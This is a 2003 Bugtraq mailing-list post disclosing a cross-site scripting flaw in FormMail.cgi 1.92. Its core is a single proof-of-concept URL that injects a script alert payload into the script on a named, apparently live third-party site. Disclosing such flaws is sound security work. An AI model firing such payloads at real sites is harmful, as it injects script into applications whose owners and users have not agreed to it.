[28491] in bugtraq
XSS (Cross Site Scripting) on FormMail.CGI
daemon@ATHENA.MIT.EDU (Rynho Zeros Web)
Mon Jan 20 21:54:47 2003
Date: Sat, 11 Jan 2003 17:50:26 +0100 (MET)
From: Rynho Zeros Web <hackargentino@gmx.net>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Message-ID: <3631.1042303826@www61.gmx.net>
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
#############################################################
Topic: XSS (Cross Site Scripting) on FormMail.CGI
Version: 1.92
Released: April 21, 2002
Manufacturer: http://www.scriptarchive.com/formmail.html
By XyborG - xyborg@bigfoot.com - http://www.rzweb.com.ar/
#############################################################
Formmai.cgi, it is a utility that serves to send forms by email, among other
uses.
The operation is simple. To see example:
http://www.l-c-u.com.ar/cgi-sys/FormMail.cgi?<script>alert("<center>Sorry,this\nis\nthe\nsecurity\nsite?\nNo_lo_Creo\n\nCyervo_Lamos...");</script>
Duh!
#############################################################
Topic: XSS (Cross Site Scripting) on FormMail.CGI
Version: 1.92
Released: April 21, 2002
Manufacturer: http://www.scriptarchive.com/formmail.html
By XyborG - xyborg@bigfoot.com - http://www.rzweb.com.ar/
#############################################################
--
XyBØrG
WebMaster de:
www.RZW.com.ar
Powered By Dattatec.Com
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
NEU: Mit GMX ins Internet. Rund um die Uhr für 1 ct/ Min. surfen!
